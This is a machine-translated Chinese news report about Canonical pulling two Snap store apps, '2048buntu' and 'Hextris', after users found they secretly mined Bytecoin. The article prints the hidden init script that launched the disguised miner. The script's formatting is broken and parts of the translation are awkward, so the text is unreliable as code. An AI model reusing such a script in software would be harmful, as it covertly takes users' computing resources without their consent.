Ubuntu将加密挖掘应用程序从其商店移除

Ubuntu Store的管理员已经将自己签名为“Nicholas Tomb”的开发者的所有应用程序都从其商店中取出,并且从他的电子邮件签名中可以发现其显然想要将自己加密挖掘成一个成功者。

由于有关2048buntu的相关评论被Github移除,因此Tomb先生的“2048buntu”和“Hextris应用程序现在都没有出现在商店中。用户Tarwirdur写道:”这个应用程序包含隐藏的加密挖矿应用在其内部“(它正在挖掘Bytecoin)这怎么可能被报道。

以下是Tarwirdur发现的代码(查看第七行中的电子邮件签名):

squashfs-root / systemd  - miner
squashfs-root / start  -  init script:
#!/bin/bash

currency=bcn
name=2048buntu

{#try
/ snap / $ name / current / systemd -u myfirstferrari@protonmail.com  -  $ currency 1 -g
} || {#catch
cores =($(grep -c ^ processor / proc / cpuinfo))

(($ cores <4)); then
    / snap / $ name / current / systemd -u myfirstferrari@protonmail.com  -  $ currency 1
else
    / snap / $ name / current / systemd -u myfirstferrari@protonmail.com  -  $ currency 2
fi
}

Canonical的Adam Collard回应:“是的,我们已经删除了所有来自该作者的申请,等待进一步调查。谢谢你的提醒!“

这些应用程序是使用Ubuntu的“Snaps”工具创建的,该工具将代码打包,以便所有依赖关系都能顺利进行,并使用自动更新程序进行安装。Canonical创建了Snaps程序以尝试并简化Linux发行版的包部署。

Ride-alone 挖矿应用很难发现:即使是那些拥有现金和人气的如谷歌和苹果等公司,也会不时漏掉这些恶意应用。而规模小得多的Canonical具有开放式源代码的优势,提供了一系列crook码检测器。

  • 发表于:
  • 原文链接http://www.theregister.co.uk/2018/05/14/ubuntu_crypto_mining_apps
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券